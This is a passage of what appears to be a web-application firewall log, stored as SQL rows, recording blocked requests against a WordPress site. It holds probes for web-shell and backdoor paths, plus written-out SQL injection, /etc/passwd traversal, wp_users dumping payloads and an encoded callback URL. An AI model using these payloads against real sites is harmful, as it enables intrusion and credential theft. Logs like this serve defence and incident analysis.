Safari\\/537.36\"}','oBahVveydxPD1n92H4EGU0c3',0,1674798127.5101,111,'','GET',403,0,700,0,1,'',0),('20.125.141.130',343772546,'','https://www.equalitywalk.org.uk/defau1t.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','mJzYd6E35OX7C0gl41WKrjUR',0,1674798128.2374,97,'','GET',403,0,700,0,1,'',0),('20.125.141.130',343772546,'','https://www.equalitywalk.org.uk/wp-text/export.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','Ntc0XG8opYV3mvQ1yCDzEKi9',0,1674798129.7797,90,'','GET',403,0,700,0,1,'',0),('20.125.141.130',343772546,'','https://www.equalitywalk.org.uk/plugins/ubh/up.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','5uQkx7z4pJV3w0BGZ9gnqPrM',0,1674798132.0243,86,'','GET',403,0,700,0,1,'',0),('20.125.141.130',343772546,'','https://www.equalitywalk.org.uk/olux.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','A8UJLQ2djhuc7tyfoP50slDW',0,1674798134.5235,144,'','GET',403,0,700,0,1,'',0),('20.125.141.130',343772546,'','https://www.equalitywalk.org.uk/wp-text/fw.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','UJ9ZMx2kr8epouInRtfyW6dm',0,1674798136.8735,113,'','GET',403,0,700,0,1,'',0),('20.125.141.130',343772546,'','https://www.equalitywalk.org.uk/tuco.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','QlKYwqnJd35obDL8PmZeahAG',0,1674798138.0622,114,'','GET',403,0,700,0,1,'',0),('20.125.141.130',343772546,'','https://www.equalitywalk.org.uk/l.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','2zpdc6mBVKTuLWtZfXHhE1Ao',0,1674798139.2482,108,'','GET',403,0,700,0,1,'',0),('20.125.141.130',343772546,'','https://www.equalitywalk.org.uk/x.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','C9m2w0kz6WpIZeGjUAMO7urK',0,1674798140.0841,128,'','GET',403,0,700,0,1,'',0),('20.125.141.130',343772546,'','https://www.equalitywalk.org.uk/shx.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','SkhKLc8lZRPdzHoQ3Mmq4Yga',0,1674798141.3754,123,'','GET',403,0,700,0,1,'',0),('20.125.141.130',343772546,'','https://www.equalitywalk.org.uk/shl.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','b8oI0nAxSksHhVE7eKRjgzcT',0,1674798142.5201,112,'','GET',403,0,700,0,1,'',0),('20.125.141.130',343772546,'','https://www.equalitywalk.org.uk/old-index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','gUb5O3lr2ZABqFvMk1DEexwC',0,1674798143.3862,85,'','GET',403,0,700,0,1,'',0),('20.125.141.130',343772546,'','https://www.equalitywalk.org.uk/f.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','Qi3Bt98pjIT6GouKPhl5zgLq',0,1674798144.5829,105,'','GET',403,0,700,0,1,'',0),('20.125.141.130',343772546,'','https://www.equalitywalk.org.uk/wsanon.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','5stGkxXTKbg96SpvR2JE0Vqa',0,1674798145.5952,150,'','GET',403,0,700,0,1,'',0),('20.125.141.130',343772546,'','https://www.equalitywalk.org.uk/2.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','SQWpDJ4b6wamy5cYkh9VICAq',0,1674798146.7200,145,'','GET',403,0,700,0,1,'',0),('20.125.141.130',343772546,'','https://www.equalitywalk.org.uk/shell.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','hON1dfsvUHLAIQnyDgj2r0xJ',0,1674798147.9094,95,'','GET',403,0,700,0,1,'',0),('20.125.141.130',343772546,'','https://www.equalitywalk.org.uk/ww.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','yzrL4w5qx3eRhVKFafuWPDJX',0,1674798149.0035,95,'','GET',403,0,700,0,1,'',0),('20.125.141.130',343772546,'','https://www.equalitywalk.org.uk/fw.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','76uhFjkbTreHBQ2agc8GpYDq',0,1674798149.9641,121,'','GET',403,0,700,0,1,'',0),('20.125.141.130',343772546,'','https://www.equalitywalk.org.uk/vendor/phpunit/phpunit/src/Util/PHP/dev.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','sW8e5LgkRQraEGMnD3ihPUyw',0,1674798151.8223,115,'','GET',403,0,700,0,1,'',0),('20.125.141.130',343772546,'','https://www.equalitywalk.org.uk/wp-text/themes/seotheme/db.php?u','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','lSGi7NnO9kH5hMgXxpstBAbI',0,1674798152.8576,97,'','GET',403,0,700,0,1,'',0),('20.125.141.130',343772546,'','https://www.equalitywalk.org.uk/wp/about.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','lF4ika75Es3jrLCYNGeoZQ1B',0,1674798153.8679,101,'','GET',403,0,700,0,1,'',0),('20.125.141.130',343772546,'','https://www.equalitywalk.org.uk/1.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','umWZyehMIrnX1gAS2kpCjPTz',0,1674798155.0948,107,'','GET',403,0,700,0,1,'',0),('20.125.141.130',343772546,'','https://www.equalitywalk.org.uk/gly.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','zOHSpXmuBNrP7b1KsIq2Yd0v',0,1674798156.5447,96,'','GET',403,0,700,0,1,'',0),('20.125.141.130',343772546,'','https://www.equalitywalk.org.uk/ahg.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','rjdNZWGYbay0EhunXcm8TSvK',0,1674798159.6338,105,'','GET',403,0,700,0,1,'',0),('20.125.141.130',343772546,'','https://www.equalitywalk.org.uk/wp-loqin.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','fIhg4mvJpLxV86Y3zRnZCHTt',0,1674798161.0767,101,'','GET',403,0,700,0,1,'',0),('20.125.141.130',343772546,'','https://www.equalitywalk.org.uk/123.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','z8g1sxvKpSk3aZ2YHPBeJ76U',0,1674798162.0849,100,'','GET',403,0,700,0,1,'',0),('20.125.141.130',343772546,'','https://www.equalitywalk.org.uk/wp-confiq.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','MqKvuEsoSnAyLUdRzig25CTH',0,1674798163.0546,85,'','GET',403,0,700,0,1,'',0),('20.125.141.130',343772546,'','https://www.equalitywalk.org.uk/about.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','nOVTUgz90IpCjEaoWfuZH8RN',0,1674798164.1458,99,'','GET',403,0,700,0,1,'',0),('20.125.141.130',343772546,'','https://www.equalitywalk.org.uk/xmrlpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','pU2LZEtTJszHBwe1A6FfWQVN',0,1674798165.2279,126,'','GET',403,0,700,0,1,'',0),('20.125.141.130',343772546,'','https://www.equalitywalk.org.uk/phpinfo.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','TNpj6UeVmtxqQzLgZ5DRciG3',0,1674798166.9522,91,'','GET',403,0,700,0,1,'',0),('20.125.141.130',343772546,'','https://www.equalitywalk.org.uk/wp-class.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','Wqrd2NSbI3T5JlQLcMZ7vK9o',0,1674798168.1149,98,'','GET',403,0,700,0,1,'',0),('20.125.141.130',343772546,'','https://www.equalitywalk.org.uk/configs.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','Hz7K2FCLMbiQReNP09yrpkOE',0,1674798168.8637,118,'','GET',403,0,700,0,1,'',0),('20.125.141.130',343772546,'','https://www.equalitywalk.org.uk/wp-class.phtml','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','lR4nLkaQv9ws5xobgztN7jZK',0,1674798169.9442,107,'','GET',403,0,700,0,1,'',0),('20.125.141.130',343772546,'','https://www.equalitywalk.org.uk/about.phtml','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','qljgELR7QwXO2xGCB0rF36Sf',0,1674798171.7959,96,'','GET',403,0,700,0,1,'',0),('20.125.141.130',343772546,'','https://www.equalitywalk.org.uk/xd.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','Ko8hW13wXTIgEf7i4uct2sae',0,1674798172.6161,93,'','GET',403,0,700,0,1,'',0),('20.125.141.130',343772546,'','https://www.equalitywalk.org.uk/w.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','jDuCskR4Np5TWAvFXrat0PiM',0,1674798173.5783,99,'','GET',403,0,700,0,1,'',0),('20.125.141.130',343772546,'','https://www.equalitywalk.org.uk/wp-admin/links.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','K2CJmXevasQd61DzrjMBES8h',0,1674798174.6272,105,'','GET',403,0,700,0,1,'',0),('20.125.141.130',343772546,'','https://www.equalitywalk.org.uk/hd.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','VPrOTLlMyC231shgveFcJDB4',0,1674798175.5470,100,'','GET',403,0,700,0,1,'',0),('20.125.141.130',343772546,'','https://www.equalitywalk.org.uk/wp-rss.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','KLX5pRvHifhxWNnYBsPdcZ4Q',0,1674798176.5732,92,'','GET',403,0,700,0,1,'',0),('20.125.141.130',343772546,'','https://www.equalitywalk.org.uk/c.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','gUkSBo5N8W4XmLTEwsi6M0VZ',0,1674798177.5074,117,'','GET',403,0,700,0,1,'',0),('20.125.141.130',343772546,'','https://www.equalitywalk.org.uk/fuk.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','Dn2EIHPMuilJbVToOxQUzef9',0,1674798178.1892,118,'','GET',403,0,700,0,1,'',0),('20.125.141.130',343772546,'','https://www.equalitywalk.org.uk/wp-includes/IXR/db.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','SR6Hkdo4ZCU7lp8PxywcjYta',0,1674798179.0286,114,'','GET',403,0,700,0,1,'',0),('20.125.141.130',343772546,'','https://www.equalitywalk.org.uk/seomarket.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','y4GWtR1B32rOYHexUMmqk0lV',0,1674798179.7945,105,'','GET',403,0,700,0,1,'',0),('20.125.141.130',343772546,'','https://www.equalitywalk.org.uk/spamtools.be.txt.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','bqPocT9xlBWUhRjO0426AIzs',0,1674798181.4727,97,'','GET',403,0,700,0,1,'',0),('20.125.141.130',343772546,'','https://www.equalitywalk.org.uk/wp-text/themes/twentyfifteen/404.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','TDMVp9Fjqc2wnsKe8vHESoP6',0,1674798182.2421,106,'','GET',403,0,700,0,1,'',0),('20.125.141.130',343772546,'','https://www.equalitywalk.org.uk/request.php?jid=58','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','W08qBopivUPIsX2um3bfcy9S',0,1674798183.0701,103,'','GET',403,0,700,0,1,'',0),('20.125.141.130',343772546,'','https://www.equalitywalk.org.uk/wp-text/plugins/jmb/edit-site.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','1xC8Feas769dhO5znKYcrBk2',0,1674798183.8187,97,'','GET',403,0,700,0,1,'',0),('20.125.141.130',343772546,'','https://www.equalitywalk.org.uk/404.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','atx1Z9eGUEqchS5bLRXKjTwJ',0,1674798184.5614,96,'','GET',403,0,700,0,1,'',0),('20.125.141.130',343772546,'','https://www.equalitywalk.org.uk/wp-text/themes/deep/local.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','dIOXt9xlniJTrf3VG86Zyzbc',0,1674798185.3350,118,'','GET',403,0,700,0,1,'',0),('185.65.134.166',3108079270,'','https://www.equalitywalk.org.uk/favicon.ico/wp-admin/admin-ajax.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/37.0.2049.0 Safari\\/537.36\",\"2\":\"https:\\/\\/www.equalitywalk.org.uk:443\"}','QBM6VJTX3p2Pa9AhtEZiYDSf',0,1674811003.7275,121,'','POST',403,0,700,0,1,'',0),('185.65.134.166',3108079270,'','https://www.equalitywalk.org.uk/favicon.ico/forum?subscribe_topic=1+union+select+1+and+sleep(6)','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/70.0.3538.77 Safari\\/537.36\"}','HsdEgYDpv7TUFBZlGKt3Omer',0,1674811003.7271,164,'','GET',403,0,700,0,1,'',0),('185.65.134.166',3108079270,'','https://www.equalitywalk.org.uk/favicon.ico/?rest_route=/olistener/new','','{\"1\":\"Mozilla\\/5.0 (X11; Linux x86_64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/41.0.2227.0 Safari\\/537.36\"}','TS1pvVk0mrMFc4WNHQXhLCwO',0,1674811003.8610,106,'','POST',403,0,520,0,1,'',0),('185.65.134.166',3108079270,'','https://www.equalitywalk.org.uk/favicon.ico/wp-admin/admin-ajax.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/35.0.3319.102 Safari\\/537.36\"}','W56Jjh4PdEobiwMN3xVqsU21',0,1674811003.9036,98,'','POST',403,0,700,0,1,'',0),('185.65.134.166',3108079270,'','https://www.equalitywalk.org.uk/favicon.ico/?post_ids=0)+union+select+md5(999999999)%2cnull%2cnull+--+g&rest_route=/pvc/v1/increase/1','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/49.0.2656.18 Safari\\/537.36\"}','q1Xkg0G5SUseCPpYydcQ8Fr7',0,1674811003.9805,110,'','GET',403,0,520,0,1,'',0),('185.65.134.166',3108079270,'','https://www.equalitywalk.org.uk/favicon.ico/wp-content/plugins/cab-fare-calculator/tblight.php?controller=../../../../../../../../../../../etc/passwd%00&action=1&ajax=1','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.2; WOW64) AppleWebKit\\/537.36 (KHTML like Gecko) Chrome\\/44.0.2403.155 Safari\\/537.36\"}','t1bd6ufqszaFrP8HR9j2STZK',0,1674811004.1426,125,'','GET',403,0,700,0,1,'',0),('185.65.134.166',3108079270,'','https://www.equalitywalk.org.uk/favicon.ico/wp-admin/admin-ajax.php?action=mec_load_single_page&time=1))+UNION+SELECT+sleep(6)+--+g','','{\"1\":\"Mozilla\\/5.0 (X11; Linux x86_64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/34.0.1847.137 Safari\\/4E423F\"}','fDRW0gcHpw8LSdmNzsnv7Kj9',0,1674811004.1132,155,'','GET',403,0,700,0,1,'',0),('185.65.134.166',3108079270,'','https://www.equalitywalk.org.uk/favicon.ico/?cffaction=get_data_from_database&query=SELECT%20*%20from%20wp_users','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/36.0.1985.67 Safari\\/537.36\"}','TM5zqYxVvrJnELKGdDaXwAk0',0,1674811004.3194,105,'','GET',403,0,700,0,1,'',0),('185.65.134.166',3108079270,'','https://www.equalitywalk.org.uk/favicon.ico/wp-admin/admin-ajax.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/35.0.2117.157 Safari\\/537.36\"}','3SpGisT9rAhcylVD4eCMzdqN',0,1674811004.3593,102,'','POST',403,0,700,0,1,'',0),('185.65.134.166',3108079270,'','https://www.equalitywalk.org.uk/favicon.ico/wp-admin/admin-ajax.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.2; WOW64) AppleWebKit\\/537.36 (KHTML like Gecko) Chrome\\/44.0.2403.155 Safari\\/537.36\"}','07q8w1EKrnbptDLuUkQ6geRz',0,1674811005.3813,174,'','POST',403,0,700,0,1,'',0),('185.65.134.166',3108079270,'','https://www.equalitywalk.org.uk/favicon.ico/wp-admin/admin-ajax.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/36.0.1985.67 Safari\\/537.36\"}','ChKcIwy1m5UtOHvNFf9BRAzL',0,1674811005.3846,195,'','POST',403,0,700,0,1,'',0),('185.65.134.166',3108079270,'','https://www.equalitywalk.org.uk/favicon.ico/?rest_route=/notificationx/v1/analytics','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/41.0.2228.0 Safari\\/537.36\"}','XjGCbSWTxytqBPpaOor6EMI9',0,1674811005.3848,195,'','POST',403,0,520,0,1,'',0),('185.65.134.166',3108079270,'','https://www.equalitywalk.org.uk/favicon.ico/wp-admin/admin-ajax.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/89.0.4389.114 Safari\\/537.36\"}','Qw9Lmyat6zJGf4ZE7No2KUpn',0,1674811005.3877,192,'','POST',403,0,700,0,1,'',0),('185.65.134.166',3108079270,'','https://www.equalitywalk.org.uk/favicon.ico/wp-admin/admin-ajax.php?action=vtprd_product_search_ajax&term=aaa\'+union+select+1%2csleep(6)%2c3--+-','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/41.0.2225.0 Safari\\/537.36\"}','BqMN5gHZko40RaL9zvVdKimt',0,1674811005.4227,157,'','GET',403,0,700,0,1,'',0),('185.65.134.166',3108079270,'','https://www.equalitywalk.org.uk/favicon.ico/wp-content/plugins/wechat-broadcast/wechat/Image.php?url=../../../../../../../../../../etc/passwd','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/40.0.2214.93 Safari\\/537.36\"}','35uLmwRZWkMNg8lBxFsjTC7Q',0,1674811005.5886,97,'','GET',403,0,700,0,1,'',0),('185.65.134.166',3108079270,'','https://www.equalitywalk.org.uk/favicon.ico/','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/35.0.3319.102 Safari\\/537.36\"}','7IEbrL2vKOJo4CNA5TfyViY3',0,1674811005.6442,97,'','POST',403,0,700,0,1,'',0),('185.65.134.166',3108079270,'','https://www.equalitywalk.org.uk/favicon.ico/wp-content/plugins/wpcargo/includes/2Ku4BMPEU9vxWl4lJDd8hHB8mSB.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/41.0.2224.3 Safari\\/537.36\"}','kSXZYAif07obhBPuTzlIH5KN',0,1674811005.6441,111,'','GET',403,0,700,0,1,'',0),('185.65.134.166',3108079270,'','https://www.equalitywalk.org.uk/favicon.ico/wp-admin/admin-ajax.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/36.0.1985.67 Safari\\/537.36\"}','f2ThsG6p0bX9qNjPHJdznZ3i',0,1674811005.6981,92,'','POST',403,0,700,0,1,'',0),('185.65.134.166',3108079270,'','https://www.equalitywalk.org.uk/favicon.ico/wp-content/plugins/quiz-master-next/tests/_support/AcceptanceTester.php','','{\"1\":\"Mozilla\\/5.0 (X11; Linux x86_64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/41.0.2227.0 Safari\\/537.36\"}','ZG7L3fgjv9pHoY8XiIMnV6Fd',0,1674811006.1580,96,'','GET',403,0,700,0,1,'',0),('185.65.134.166',3108079270,'','https://www.equalitywalk.org.uk/favicon.ico/index.php/video?dl=aHR0cDovL2ludGVyYWN0LnNoLw==','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/70.0.3538.77 Safari\\/537.36\"}','MkD4J1E3CqZQsuG7axrRdSK9',0,1674811006.1594,115,'','GET',403,0,700,0,1,'',0),('185.65.134.166',3108079270,'','https://www.equalitywalk.org.uk/favicon.ico/wp-content/plugins/admin-word-count-column/download-csv.php?path=../../../../../../../../../../../../etc/passwd\\0','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/89.0.4389.114 Safari\\/537.36\"}','ATZizH5WDberCBNLdtQYvygx',0,1674811006.1594,115,'','GET',403,0,700,0,1,'',0),('185.65.134.166',3108079270,'','https://www.equalitywalk.org.uk/favicon.ico/wp-admin/admin-ajax.php?action=get_question&question_id=1%20AND%20(SELECT%207242%20FROM%20(SELECT(SLEEP(4)))HQYx)','','{\"1\":\"Mozilla\\/5.0 (X11; Linux x86_64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/41.0.2227.0 Safari\\/537.36\"}','8qAZ3Q9412HLCyEPU5IjnYcb',0,1674811006.3658,134,'','GET',403,0,700,0,1,'',0),('185.65.134.166',3108079270,'','https://www.equalitywalk.org.uk/favicon.ico/wp-admin/admin-ajax.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/41.0.2225.0 Safari\\/537.36\",\"2\":\"https:\\/\\/www.equalitywalk.org.uk:443\\/favicon.ico\"}','hwTSbc2sKOv5BaUdkC6uNqJf',0,1674811006.7553,108,'','POST',403,0,700,0,1,'',0),('185.65.134.166',3108079270,'','https://www.equalitywalk.org.uk/favicon.ico/?rest_route=/wpgmza/v1/markers&filter=%7b%7d&fields=%2a%20from%20wp_users--%20-','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/54.0.2866.71 Safari\\/537.36\"}','jGn5m1lERAKX6YTgLpkfUVMy',0,1674811006.7552,161,'','GET',403,0,520,0,1,'',0),('185.65.134.166',3108079270,'','https://www.equalitywalk.org.uk/favicon.ico/wp-content/uploads/workreap-temp/2Ku4Bavo2AW4ACifCwMlbtszQ2b.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/70.0.3538.77 Safari\\/537.36\"}','x5OVSzahkLHn2pTQAg70q39b',0,1674811007.3673,124,'','GET',403,0,700,0,1,'',0),('185.65.134.166',3108079270,'','https://www.equalitywalk.org.uk/favicon.ico/wp-admin/admin-ajax.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/35.0.3319.102 Safari\\/537.36\"}','wmpnTosKiUxuacZ56tELOl9g',0,1674811007.4506,102,'','POST',403,0,700,0,1,'',0),('185.65.134.166',3108079270,'','https://www.equalitywalk.org.uk/favicon.ico/wp-json/am-member/license','','{\"1\":\"Mozilla\\/5.0 (X11; Linux x86_64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/41.0.2227.0 